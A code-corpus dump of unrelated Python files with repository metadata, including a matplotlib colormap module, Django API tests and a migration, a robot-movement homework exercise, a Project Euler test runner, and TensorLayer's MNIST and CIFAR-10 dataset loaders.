(0.460000, 0.540000, 0.570000), # Name=Color35
(0.410000, 0.510000, 0.590000), # Name=Color36
(0.430000, 0.480000, 0.520000), # Name=Color37
(0.490000, 0.600000, 0.820000), # Name=Color38
(0.500000, 0.500000, 0.610000), # Name=Color39
(0.670000, 0.650000, 0.750000), # Name=Color40
(0.830000, 0.810000, 0.530000), # Name=Color41
(0.870000, 0.730000, 0.530000), # Name=Color42
(0.740000, 0.620000, 0.510000), # Name=Color43
(0.780000, 0.600000, 0.490000), # Name=Color44
(0.750000, 0.510000, 0.470000), # Name=Color45
(0.810000, 0.370000, 0.380000), # Name=Color46
(0.670000, 0.560000, 0.580000), # Name=Color47
(0.650000, 0.470000, 0.480000), # Name=Color48
(0.580000, 0.410000, 0.440000), # Name=Color49
(0.830000, 0.350000, 0.330000), # Name=Color50
]
root_cmap = matplotlib.colors.ListedColormap([TCOLORS[i] for i in PALETTE])
root_cmap.set_over(TCOLORS[PALETTE[-1]]);
root_cmap.set_under(TCOLORS[PALETTE[0]])
root07_cmap = matplotlib.colors.ListedColormap([TCOLORS[i] for i in PALETTE07])
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description=__doc__)
args = parser.parse_args()
import numpy as np
import pylab as plt
from mpl_toolkits.mplot3d import Axes3D
def fn(x,y):
return 0.1+(1-(x-2)*(x-2))*(1-(y-2)*(y-2))
xx,yy = np.meshgrid(np.linspace(1,3,1000),np.linspace(1,3,1000))
plt.figure(figsize=(6,4))
levels = np.arange(0.1,1.2,0.1)
plt.contourf(xx,yy,fn(xx,yy),levels,vmin=0.07,vmax=1.05,cmap=root_cmap)
plt.colorbar(ticks=levels,pad=0.01,aspect=10)
plt.subplots_adjust(left=0.08,right=0.99)
""" Equivalent in ROOT:
TCanvas *c1 = new TCanvas("c1","c1",0,0,600,400);
TF2 *f1 = new TF2("f1","0.1+(1-(x-2)*(x-2))*(1-(y-2)*(y-2))",1,3,1,3);
f1->SetNpx(1000);
f1->SetNpy(1000);
Double_t levels[] = {0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1.0,1.1};
f1->SetContour(10,levels);
gStyle->SetPalette(-1);
f1->Draw("colz")
"""
fig = plt.figure(figsize=(6,4))
ax = fig.add_subplot(111, projection='3d')
im = ax.plot_surface(xx,yy,fn(xx,yy),vmin=0.1,vmax=1.09,cmap=root_cmap)
plt.colorbar(im,ticks=np.arange(0,1.2,0.1))
"""
TCanvas *c2 = new TCanvas("c2","c2",0,0,600,400);
f1->SetContour(20);
f1->SetNpx(20);
f1->SetNpy(20)
f1->Draw("surf1z");
"""
| [
"[email protected]"
] | |
fe9df61a2e258863b6e2aee9719643e854ebe04c | 11ff5d1651b1a3972de8d7fe369943166cb1e8dd | /lab9/backend_squares/squares/squares_app/tests/e2e/test_e2e.py | 3c2864a8f70764ecee0fdd0d4badaa97762aeee1 | [] | no_license | ilyalevushkin/computer_networks | b0eb4fa1d20a381480b6b278c01a753a98bf23ee | 3fc63850ef27779404b8d3fd054f194b78c7ee21 | refs/heads/main | 2023-05-25T11:19:06.055725 | 2021-06-16T12:58:12 | 2021-06-16T12:58:12 | 316,938,267 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,684 | py | from http import HTTPStatus
from django.test import TestCase
import os
from copy import deepcopy
import json
from django.contrib.auth.models import User
from ...models import Users, PullPlayers, Games
class GameWithPoolUserTest(TestCase):
@classmethod
def setUpTestData(cls):
#arrange
cls.passed = 0
cls.user1_data = {'User': {
'user': {
'username': 'den',
'first_name': 'denis',
'last_name': 'reling',
'email': '[email protected]',
'password': '123'
},
'phone': '1111111',
'about': 'infoooooo'
}}
cls.login_data1 = {'User_signin': {
'username': cls.user1_data['User']['user']['username'],
'password': cls.user1_data['User']['user']['password']
}}
cls.user2_data = {'User': {
'user': {
'username': 'den2',
'first_name': 'denis2',
'last_name': 'reling2',
'email': '[email protected]',
'password': '123'
},
'phone': '11111112',
'about': 'infoooooo2'
}}
cls.login_data2 = {'User_signin': {
'username': cls.user2_data['User']['user']['username'],
'password': cls.user2_data['User']['user']['password']
}}
cls.game_data = {'Game': {
'player_1_id': None,
'player_2_id': None,
'game_state': {
'turn': '1',
'columns': 1,
'rows': 2,
'table_with_chips': '00'
}
}}
cls.patch_data = {
'Game_state_update': {
'column_pos': 0,
'row_pos': None,
'value': ''
}
}
def passedPercent(self):
print(f'{self.passed}/{self.n}')
def create_user(self, person):
data = self.user1_data
if person == 2:
data = self.user2_data
response = self.client.post('/api/v1/users/signup', data=json.dumps(data),
content_type='application/json')
return response
def login_user(self, person):
data = self.login_data1
if person == 2:
data = self.login_data2
response = self.client.post('/api/v1/users/signin', data=json.dumps(data),
content_type='application/json')
return response
def get_user_info(self, person, token):
data = self.get_user_by_username(self.user1_data['User']['user']['username'])
if person == 2:
data = self.get_user_by_username(self.user2_data['User']['user']['username'])
response = self.client.get('/api/v1/users/' + str(data.pk), HTTP_AUTHORIZATION=('Token ' + token))
return response
def search_users_in_pull(self, token):
return self.client.get('/api/v1/pull_players', HTTP_AUTHORIZATION=('Token ' + token))
def add_user_in_pull(self, token):
return self.client.post('/api/v1/pull_players', HTTP_AUTHORIZATION=('Token ' + token))
def start_game(self, person_by, first_turn, token):
data = self.game_data
data['Game']['game_state']['turn'] = str(first_turn)
data['Game']['player_2_id'] = self.get_user_by_username(self.user1_data['User']['user']['username']).pk
data['Game']['player_1_id'] = self.get_user_by_username(self.user2_data['User']['user']['username']).pk
if person_by == 2:
data['Game']['player_2_id'], data['Game']['player_1_id'] = data['Game']['player_1_id'], \
data['Game']['player_2_id']
return self.client.post('/api/v1/games', data=json.dumps(data),
content_type='application/json', HTTP_AUTHORIZATION=('Token ' + token))
def get_game_by_user(self, person_by, token):
user = self.get_user_by_username(self.user1_data['User']['user']['username'])
if person_by == 2:
user = self.get_user_by_username(self.user2_data['User']['user']['username'])
return self.client.get('/api/v1/games/users/' + str(user.pk) + '?active=1', HTTP_AUTHORIZATION=('Token ' + token))
def make_turn(self, game_id, position, person, token):
data = self.patch_data
data['Game_state_update']['row_pos'] = position
data['Game_state_update']['value'] = str(person)
return self.client.patch('/api/v1/games/' + str(game_id), data=json.dumps(data),
content_type='application/json', HTTP_AUTHORIZATION=('Token ' + token))
def logout_user(self, token):
return self.client.get('/api/v1/users/signout', HTTP_AUTHORIZATION=('Token ' + token))
def get_user_by_username(self, username):
return Users.objects.get(user__username=username)
def test_live(self):
self.n = int(os.getenv('TEST_REPEATS', 100))
self.passed = 0
for i in range(self.n):
self.__test_live()
self.passedPercent()
def __test_live(self):
# create 2 users
# act
response = self.create_user(person=1)
#assert
self.assertEqual(response.status_code, HTTPStatus.CREATED)
self.assertEqual(self.get_user_by_username(self.user1_data['User']['user']['username']).user.username,
self.user1_data['User']['user']['username'])
#act
response = self.create_user(person=2)
# assert
self.assertEqual(response.status_code, HTTPStatus.CREATED)
self.assertEqual(self.get_user_by_username(self.user2_data['User']['user']['username']).user.username,
self.user2_data['User']['user']['username'])
# login user1 and user2
#act
response = self.login_user(person=1)
user1_token = response.data['Token']
#assert
self.assertEqual(response.status_code, HTTPStatus.OK)
#act
response = self.login_user(person=2)
user2_token = response.data['Token']
#assert
self.assertEqual(response.status_code, HTTPStatus.OK)
# search info about user1 and user2
#act
response = self.get_user_info(person=1, token=user1_token)
#assert
self.assertEqual(response.status_code, HTTPStatus.OK)
self.assertEqual(response.data['User']['user']['username'], self.user1_data['User']['user']['username'])
# act
response = self.get_user_info(person=2, token=user2_token)
# assert
self.assertEqual(response.status_code, HTTPStatus.OK)
self.assertEqual(response.data['User']['user']['username'], self.user2_data['User']['user']['username'])
# search users in pull by user1
#act
response = self.search_users_in_pull(token=user1_token)
#assert
self.assertEqual(response.status_code, HTTPStatus.OK)
self.assertEqual(len(response.data['Pull_players']), 0)
# add user1 to pull
# act
response = self.add_user_in_pull(token=user1_token)
# assert
self.assertEqual(response.status_code, HTTPStatus.CREATED)
# search users in pull by user2
# act
response = self.search_users_in_pull(token=user2_token)
# assert
self.assertEqual(response.status_code, HTTPStatus.OK)
self.assertEqual(len(response.data['Pull_players']), 1)
self.assertEqual(response.data['Pull_players'][0]['player']['user']['username'],
self.user1_data['User']['user']['username'])
# start game with user1 by user2
# act
response = self.start_game(person_by=2, first_turn=2, token=user2_token)
user2_game_id = response.data['Game']['id']
# assert
self.assertEqual(response.status_code, HTTPStatus.OK)
self.assertEqual(response.data['Game']['game_state']['table_with_chips'],
self.game_data['Game']['game_state']['table_with_chips'])
# get game_info by user1
# act
response = self.get_game_by_user(person_by=1, token=user1_token)
user1_game_id = response.data['Game']['id']
# assert
self.assertEqual(response.status_code, HTTPStatus.OK)
self.assertEqual(response.data['Game']['player_1']['user']['username'],
self.user1_data['User']['user']['username'])
self.assertEqual(response.data['Game']['player_2']['user']['username'],
self.user2_data['User']['user']['username'])
self.assertEqual(response.data['Game']['game_state']['turn'], '2')
self.assertEqual(user1_game_id, user2_game_id)
# user2 make turn
# act
response = self.make_turn(game_id=user2_game_id, position=0, person=2, token=user2_token)
# assert
self.assertEqual(response.status_code, HTTPStatus.OK)
self.assertEqual(response.data['Game']['game_state']['table_with_chips'], '20')
self.assertEqual(response.data['Game']['game_state']['turn'], '1')
self.assertEqual(response.data['Game']['game_state']['status'], '-1')
# user1 make turn and tied
# act
response = self.make_turn(game_id=user2_game_id, position=1, person=1, token=user1_token)
# assert
self.assertEqual(response.status_code, HTTPStatus.OK)
self.assertEqual(response.data['Game']['game_state']['table_with_chips'], '21')
self.assertEqual(response.data['Game']['game_state']['turn'], '2')
self.assertEqual(response.data['Game']['game_state']['status'], '0')
# logout user1 and user2
# act
response = self.logout_user(token=user1_token)
# assert
self.assertEqual(response.status_code, HTTPStatus.OK)
# act
response = self.logout_user(token=user2_token)
# assert
self.assertEqual(response.status_code, HTTPStatus.OK)
# проверка, вышли ли users
# act
response = self.logout_user(token=user1_token)
# assert
self.assertNotEqual(response.status_code, HTTPStatus.OK)
# act
response = self.logout_user(token=user2_token)
# assert
self.assertNotEqual(response.status_code, HTTPStatus.OK)
# Total
self.passed += 1
# Cleanup
Games.objects.all().delete()
PullPlayers.objects.all().delete()
Users.objects.all().delete()
User.objects.all().delete()
| [
"[email protected]"
] | |
2bae6e3b66955458f062196496992f4f9b1a1513 | 99c4d4a6592fded0e8e59652484ab226ac0bd38c | /code/batch-2/dn9 - minobot/M-17068-2501.py | 51567abcbd0bb9da09e40e7d35ee022e3cb5716c | [] | no_license | benquick123/code-profiling | 23e9aa5aecb91753e2f1fecdc3f6d62049a990d5 | 0d496d649247776d121683d10019ec2a7cba574c | refs/heads/master | 2021-10-08T02:53:50.107036 | 2018-12-06T22:56:38 | 2018-12-06T22:56:38 | 126,011,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,142 | py | def premik(ukaz, x, y, smer):
smeri = "NESW"
premiki = [(0, -1), (1, 0), (0, 1), (-1, 0)]
ismer = smeri.index(smer)
if ukaz == "R":
smer = smeri[(ismer + 1) % 4]
elif ukaz == "L":
smer = smeri[(ismer - 1) % 4]
else:
dx, dy = premiki[ismer]
x += dx * ukaz
y += dy * ukaz
return x, y, smer
def angleski(ime_datoteke):
t = open(ime_datoteke, encoding="utf - 8")
s = t.read().split()
popsez = []
for i, x in enumerate(s):
if x[0] == "D":
popsez.append("R")
if x[0] == "L":
popsez.append(x[0])
if x[0] == "N":
popsez.append(s[i + 1])
return popsez
def izvedi(ime_datoteke):
x, y, smer = 0, 0, "N"
stanja = []
stanja.append((x, y, smer))
for e in angleski(ime_datoteke):
if e == "R" or e == "L":
ukaz = e
else:
ukaz = int(e)
stanja.append(premik(ukaz, x, y, smer))
x, y, smer = premik(ukaz, x, y, smer)
return stanja
def opisi_stanje(x, y, smer):
s = {"N" : "^", "E" : ">",
"S" : "v", "W" : "<" }
return "{:>3}:{:<3}{:>2}".format(x,y,s[smer])
def prevedi(ime_vhoda, ime_izhoda):
t = open(ime_izhoda, "w")
for x, y, smer in izvedi(ime_vhoda):
t.write(opisi_stanje(x, y, smer) + "\n")
t.close()
def opisi_stanje_2(x, y, smer):
s = {"N" : "^", "E" : ">",
"S" : "v", "W" : "<"}
if 99 > x > 9 or x < 0:
return "{:<3}({:}:{:>})".format(s[smer], x ,y)
if x > 99:
return "{:<2}({:}:{:>})".format(s[smer], x ,y)
else:
return "{:<4}({:}:{:>})".format(s[smer], x ,y)
import unittest
class TestObvezna(unittest.TestCase):
def test_branje(self):
self.assertEqual(
izvedi("primer.txt"),
[(0, 0, 'N'), (0, 0, 'E'), (12, 0, 'E'), (12, 0, 'S'), (12, 2, 'S'),
(12, 2, 'E'), (15, 2, 'E'), (15, 2, 'N'), (15, 2, 'W')]
)
self.assertEqual(
izvedi("ukazi.txt"),
[(0, 0, 'N'), (0, 0, 'E'), (1, 0, 'E'), (1, 0, 'S'), (1, 0, 'W'),
(0, 0, 'W'), (0, 0, 'S'), (0, 0, 'E'), (1, 0, 'E'), (1, 0, 'S'),
(1, 3, 'S'), (1, 3, 'E'), (2, 3, 'E'), (2, 3, 'S'), (2, 3, 'W')]
)
def test_opisi_stanje(self):
self.assertEqual(opisi_stanje(0, 12, "N"), " 0:12 ^")
self.assertEqual(opisi_stanje(111, 0, "E"), "111:0 >")
self.assertEqual(opisi_stanje(-2, 111, "S"), " -2:111 v")
self.assertEqual(opisi_stanje(0, 0, "W"), " 0:0 <")
def test_prevedi(self):
from random import randint
import os
ime = "izhod{:05}.txt".format(randint(0, 99999))
try:
self.assertIsNone(prevedi("primer.txt", ime))
self.assertEqual(open(ime).read().rstrip(), """ 0:0 ^
0:0 >
12:0 >
12:0 v
12:2 v
12:2 >
15:2 >
15:2 ^
15:2 <""")
self.assertIsNone(prevedi("ukazi.txt", ime))
self.assertEqual(open(ime).read().rstrip(), """ 0:0 ^
0:0 >
1:0 >
1:0 v
1:0 <
0:0 <
0:0 v
0:0 >
1:0 >
1:0 v
1:3 v
1:3 >
2:3 >
2:3 v
2:3 <""")
finally:
os.remove(ime)
vime = "vhod{:05}.txt".format(randint(0, 99999))
open(vime, "wt").write("NAPREJ 23\nLEVO\nNAPREJ 17\n")
try:
self.assertIsNone(prevedi(vime, ime))
self.assertEqual(open(ime).read().rstrip(), """ 0:0 ^
0:-23 ^
0:-23 <
-17:-23 <""")
finally:
os.remove(ime)
os.remove(vime)
class TestDodatna(unittest.TestCase):
def test_opisi_stanje(self):
self.assertEqual(opisi_stanje_2(0, 12, "N"), "^ (0:12)")
self.assertEqual(opisi_stanje_2(111, 0, "E"), "> (111:0)")
self.assertEqual(opisi_stanje_2(-2, 111, "S"), "v (-2:111)")
self.assertEqual(opisi_stanje_2(0, 0, "W"), "< (0:0)")
if __name__ == "__main__":
unittest.main()
| [
"[email protected]"
] | |
7157050d8baaafca99fac5e26a9089f52b26636c | b2e9e3db0202a6bd06b5d1f4c4fd3369b5260261 | /python/tests.py | db2473b8cd480c38936c4f0a6c01bddbac30db5c | [] | no_license | jackmoody11/project-euler-solutions | 66e7128cae130499ce518c2008e5df91a6883a68 | 8b6e00bfac7855f5c892f5b3094415935358cb98 | refs/heads/master | 2020-04-12T23:52:57.347142 | 2020-01-10T00:23:16 | 2020-01-10T00:23:16 | 162,831,576 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,600 | py | import importlib
import time
import doctest
import sys
import argparse
filename = "../answers.txt"
with open(filename, 'r') as f:
lines = [line.strip() for line in f.readlines()]
ANSWERS = {int(line.split(". ")[0]):
line.split(". ")[1] for line in lines}
def test(prob, expected):
try:
module = importlib.import_module("p{:03d}".format(prob))
except ImportError:
raise ImportError(
"It looks like you haven't solved #{prob} yet".format(prob=prob))
start = time.time()
actual = int(module.compute()) # Must return an int
elapsed = int((time.time() - start) * 1000)
print("Problem {:03d}: {:7d} ms".format(
prob, elapsed),
"" if actual == expected else " *** FAIL ***")
return elapsed
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('numbers', type=int, nargs='*')
parser.add_argument('-g', '--graph', action='store_true',
help='graph execution time for selected problems')
parser.add_argument('--doctest', action='store_true',
help='run doctests on utils')
args = parser.parse_args()
return args
def main(doctests=False):
args = get_args()
results = dict()
if len(args.numbers) > 0:
for prob in args.numbers:
try:
results[prob] = test(prob, ANSWERS[prob])
except KeyError:
raise KeyError(
"It looks like you haven't added #{prob} to answers.txt yet".format(prob=prob))
num_probs = len(args.numbers)
prob_names = ", ".join(map(str, args.numbers))
else:
for (prob, expected) in sorted(ANSWERS.items()):
results[prob] = test(prob, expected)
num_probs = len(ANSWERS)
prob_names = "(all)"
total_time = sum(results.values())
print("Total computation time: {} secs".format(total_time / 1000))
print("{} problems solved".format(num_probs))
if args.doctest:
doctesting()
if args.graph:
graph(results, prob_names)
def doctesting():
import utils
doctest.testmod(utils, verbose=True)
return 0
def graph(data, probs):
import matplotlib.pyplot as plt
from matplotlib import rc
rc('text', usetex=True)
plt.bar(data.keys(), data.values())
plt.title(
'Execution Time (secs) for Project Euler Problems {0}'.format(probs))
plt.xlabel('Project Euler Problem Number')
plt.ylabel('Execution Time (ms)')
plt.show()
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
714d966a83c3c2a5e4206edcffebd91a7fd93889 | d0cdcbe3471cc980809fd4ed5182385bb23216b5 | /backend/task_profile/migrations/0001_initial.py | 79a56729aed9aebe14923d104aef369745363a4a | [] | no_license | crowdbotics-apps/strippee-19912 | 4770d421f16389e3ada580018e52385094cedf00 | 16d1d6258dca231fb157ecb3fa6709f490a5c1fc | refs/heads/master | 2022-12-09T22:53:07.670289 | 2020-09-01T20:24:27 | 2020-09-01T20:24:27 | 292,099,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,239 | py | # Generated by Django 2.2.16 on 2020-09-01 20:22
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='TaskerProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('mobile_number', models.CharField(max_length=20)),
('photo', models.URLField()),
('timestamp_created', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('last_login', models.DateTimeField(blank=True, null=True)),
('description', models.TextField(blank=True, null=True)),
('city', models.CharField(blank=True, max_length=50, null=True)),
('vehicle', models.CharField(blank=True, max_length=50, null=True)),
('closing_message', models.TextField(blank=True, null=True)),
('work_area_radius', models.FloatField(blank=True, null=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='taskerprofile_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Notification',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(max_length=20)),
('message', models.TextField()),
('timestamp_created', models.DateTimeField(auto_now_add=True)),
('user', models.ManyToManyField(related_name='notification_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='InviteCode',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('code', models.CharField(max_length=20)),
('timestamp_created', models.DateTimeField(auto_now_add=True)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invitecode_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='CustomerProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('mobile_number', models.CharField(max_length=20)),
('photo', models.URLField()),
('timestamp_created', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('last_login', models.DateTimeField(blank=True, null=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='customerprofile_user', to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"[email protected]"
] | |
d53072873c3a5166c4017a13617ff165c8605c46 | 5c89f7c8ad6213b8c194c6e45424db199ef31041 | /s5/1.5.1_operaciones_aritmeticas_input copy.py | d4c5cd82e4a065d1b2e3730e75c9ea76506033c8 | [] | no_license | camohe90/mision_tic_G6 | 1ccfe5eef6094a1bc0dc6ca5debf2c7a9e959121 | bc04a468a568b5972b29e40643799cd9848219d8 | refs/heads/master | 2023-05-29T14:26:53.946013 | 2021-06-09T14:44:59 | 2021-06-09T14:44:59 | 366,415,146 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 535 | py | numero1 = int(input("ingrese numero 1: "))
numero2 = int(input("ingrese numero 2: "))
suma = numero1 + numero2
print(suma)
print(type(suma))
resta = numero1 - numero2
print(resta)
print(type(resta))
multiplicacion = numero1 * numero2
print(multiplicacion)
print(type(multiplicacion))
division = numero1 / numero2
print(division)
print(type(division))
division_entera = numero1 // numero2
print(division_entera)
print(type(division_entera))
modulo = numero1 % numero2
print(modulo)
print(type(modulo)) | [
"[email protected]"
] | |
9494c14281d52325c997fa672d79c0f65cd32d67 | 92436a50cc26c8c8a216ba6d4a62e36069614234 | /test/losses_multi_output_sum_loss_test.py | 1bd83488fc1d642aace065a621b9b116176498fb | [
"MIT"
] | permissive | hahaxun/ClassyVision | 9341f4e6849c858094592052f3df111c13d1a91d | b3f714ef94275b3e9753ab3f3c8256cb852b96fc | refs/heads/master | 2021-08-17T07:42:34.402613 | 2021-03-08T08:50:01 | 2021-03-08T08:50:01 | 245,940,574 | 1 | 0 | MIT | 2021-03-08T08:50:01 | 2020-03-09T04:02:59 | Python | UTF-8 | Python | false | false | 1,176 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
import torch
from classy_vision.losses import (
ClassyLoss,
MultiOutputSumLoss,
build_loss,
register_loss,
)
@register_loss("mock_1")
class MockLoss1(ClassyLoss):
def forward(self, pred, target):
return torch.tensor(1.0)
@classmethod
def from_config(cls, config):
return cls()
class TestMultiOutputSumLoss(unittest.TestCase):
def test_multi_output_sum_loss(self):
config = {"name": "multi_output_sum_loss", "loss": {"name": "mock_1"}}
crit = build_loss(config)
self.assertTrue(isinstance(crit, MultiOutputSumLoss))
# test with a single output
output = torch.tensor([1.0, 2.3])
target = torch.tensor(1.0)
self.assertAlmostEqual(crit(output, target).item(), 1.0)
# test with a list of outputs
output = [torch.tensor([1.2, 3.2])] * 5
target = torch.tensor(2.3)
self.assertAlmostEqual(crit(output, target).item(), 5.0)
| [
"[email protected]"
] | |
ef4e6cc1b28a2ca6361fa63d714a9dabbaeca22d | f07a42f652f46106dee4749277d41c302e2b7406 | /Test Set/Open Source Projects/tensorlayer/0e46845d609c2ce2eeee19cf69ed2a8b14bfdacd-0-fix.py | 9c842d7bd821cd42159e6b32ab37a1fd196b4887 | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 66,584 | py | # -*- coding: utf-8 -*-
"""
A collections of helper functions to work with dataset.
Load benchmark dataset, save and restore model, save and load variables.
TensorFlow provides ``.ckpt`` file format to save and restore the models, while
we suggest to use standard python file format ``.npz`` to save models for the
sake of cross-platform.
.. code-block:: python
## save model as .ckpt
saver = tf.train.Saver()
save_path = saver.save(sess, "model.ckpt")
# restore model from .ckpt
saver = tf.train.Saver()
saver.restore(sess, "model.ckpt")
## save model as .npz
tl.files.save_npz(network.all_params , name='model.npz')
# restore model from .npz (method 1)
load_params = tl.files.load_npz(name='model.npz')
tl.files.assign_params(sess, load_params, network)
# restore model from .npz (method 2)
tl.files.load_and_assign_npz(sess=sess, name='model.npz', network=network)
## you can assign the pre-trained parameters as follow
# 1st parameter
tl.files.assign_params(sess, [load_params[0]], network)
# the first three parameters
tl.files.assign_params(sess, load_params[:3], network)
"""
import gzip
import os
import pickle
import re
import sys
import tarfile
import zipfile
import numpy as np
import tensorflow as tf
from six.moves import cPickle, zip
from tensorflow.python.platform import gfile
from . import _logging as logging
from . import nlp, utils, visualize
## Load dataset functions
def load_mnist_dataset(shape=(-1, 784), path='data'):
"""Load the original mnist.
Automatically download MNIST dataset and return the training, validation and test set with 50000, 10000 and 10000 digit images respectively.
Parameters
----------
shape : tuple
The shape of digit images (the default is (-1, 784), alternatively (-1, 28, 28, 1)).
path : str
The path that the data is downloaded to.
Returns
-------
X_train, y_train, X_val, y_val, X_test, y_test: tuple
Return splitted training/validation/test set respectively.
Examples
--------
>>> X_train, y_train, X_val, y_val, X_test, y_test = tl.files.load_mnist_dataset(shape=(-1,784), path='datasets')
>>> X_train, y_train, X_val, y_val, X_test, y_test = tl.files.load_mnist_dataset(shape=(-1, 28, 28, 1))
"""
return _load_mnist_dataset(shape, path, name='mnist', url='http://yann.lecun.com/exdb/mnist/')
def load_fashion_mnist_dataset(shape=(-1, 784), path='data'):
"""Load the fashion mnist.
Automatically download fashion-MNIST dataset and return the training, validation and test set with 50000, 10000 and 10000 fashion images respectively, `examples <http://marubon-ds.blogspot.co.uk/2017/09/fashion-mnist-exploring.html>`__.
Parameters
----------
shape : tuple
The shape of digit images (the default is (-1, 784), alternatively (-1, 28, 28, 1)).
path : str
The path that the data is downloaded to.
Returns
-------
X_train, y_train, X_val, y_val, X_test, y_test: tuple
Return splitted training/validation/test set respectively.
Examples
--------
>>> X_train, y_train, X_val, y_val, X_test, y_test = tl.files.load_fashion_mnist_dataset(shape=(-1,784), path='datasets')
>>> X_train, y_train, X_val, y_val, X_test, y_test = tl.files.load_fashion_mnist_dataset(shape=(-1, 28, 28, 1))
"""
return _load_mnist_dataset(shape, path, name='fashion_mnist', url='http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/')
def _load_mnist_dataset(shape, path, name='mnist', url='http://yann.lecun.com/exdb/mnist/'):
"""A generic function to load mnist-like dataset.
Parameters:
----------
shape : tuple
The shape of digit images.
path : str
The path that the data is downloaded to.
name : str
The dataset name you want to use(the default is 'mnist').
url : str
The url of dataset(the default is 'http://yann.lecun.com/exdb/mnist/').
"""
path = os.path.join(path, name)
# Define functions for loading mnist-like data's images and labels.
# For convenience, they also download the requested files if needed.
def load_mnist_images(path, filename):
filepath = maybe_download_and_extract(filename, path, url)
logging.info(filepath)
# Read the inputs in Yann LeCun's binary format.
with gzip.open(filepath, 'rb') as f:
data = np.frombuffer(f.read(), np.uint8, offset=16)
# The inputs are vectors now, we reshape them to monochrome 2D images,
# following the shape convention: (examples, channels, rows, columns)
data = data.reshape(shape)
# The inputs come as bytes, we convert them to float32 in range [0,1].
# (Actually to range [0, 255/256], for compatibility to the version
# provided at http://deeplearning.net/data/mnist/mnist.pkl.gz.)
return data / np.float32(256)
def load_mnist_labels(path, filename):
filepath = maybe_download_and_extract(filename, path, url)
# Read the labels in Yann LeCun's binary format.
with gzip.open(filepath, 'rb') as f:
data = np.frombuffer(f.read(), np.uint8, offset=8)
# The labels are vectors of integers now, that's exactly what we want.
return data
# Download and read the training and test set images and labels.
logging.info("Load or Download {0} > {1}".format(name.upper(), path))
X_train = load_mnist_images(path, 'train-images-idx3-ubyte.gz')
y_train = load_mnist_labels(path, 'train-labels-idx1-ubyte.gz')
X_test = load_mnist_images(path, 't10k-images-idx3-ubyte.gz')
y_test = load_mnist_labels(path, 't10k-labels-idx1-ubyte.gz')
# We reserve the last 10000 training examples for validation.
X_train, X_val = X_train[:-10000], X_train[-10000:]
y_train, y_val = y_train[:-10000], y_train[-10000:]
# We just return all the arrays in order, as expected in main().
# (It doesn't matter how we do this as long as we can read them again.)
X_train = np.asarray(X_train, dtype=np.float32)
y_train = np.asarray(y_train, dtype=np.int32)
X_val = np.asarray(X_val, dtype=np.float32)
y_val = np.asarray(y_val, dtype=np.int32)
X_test = np.asarray(X_test, dtype=np.float32)
y_test = np.asarray(y_test, dtype=np.int32)
return X_train, y_train, X_val, y_val, X_test, y_test
def load_cifar10_dataset(shape=(-1, 32, 32, 3), path='data', plotable=False):
"""Load CIFAR-10 dataset.
It consists of 60000 32x32 colour images in 10 classes, with
6000 images per class. There are 50000 training images and 10000 test images.
The dataset is divided into five training batches and one test batch, each with
10000 images. The test batch contains exactly 1000 randomly-selected images from
each class. The training batches contain the remaining images in random order,
but some training batches may contain more images from one class than another.
Between them, the training batches contain exactly 5000 images from each class.
Parameters
----------
shape : tupe
The shape of digit images e.g. (-1, 3, 32, 32) and (-1, 32, 32, 3).
path : str
The path that the data is downloaded to, defaults is ``data/cifar10/``.
plotable : boolean
Whether to plot some image examples, False as default.
Examples
--------
>>> X_train, y_train, X_test, y_test = tl.files.load_cifar10_dataset(shape=(-1, 32, 32, 3))
References
----------
- `CIFAR website <https://www.cs.toronto.edu/~kriz/cifar.html>`__
- `Data download link <https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz>`__
- `<https://teratail.com/questions/28932>`__
"""
path = os.path.join(path, 'cifar10')
logging.info("Load or Download cifar10 > {}".format(path))
#Helper function to unpickle the data
def unpickle(file):
fp = open(file, 'rb')
if sys.version_info.major == 2:
data = pickle.load(fp)
elif sys.version_info.major == 3:
data = pickle.load(fp, encoding='latin-1')
fp.close()
return data
filename = 'cifar-10-python.tar.gz'
url = 'https://www.cs.toronto.edu/~kriz/'
#Download and uncompress file
maybe_download_and_extract(filename, path, url, extract=True)
#Unpickle file and fill in data
X_train = None
y_train = []
for i in range(1, 6):
data_dic = unpickle(os.path.join(path, 'cifar-10-batches-py/', "data_batch_{}".format(i)))
if i == 1:
X_train = data_dic['data']
else:
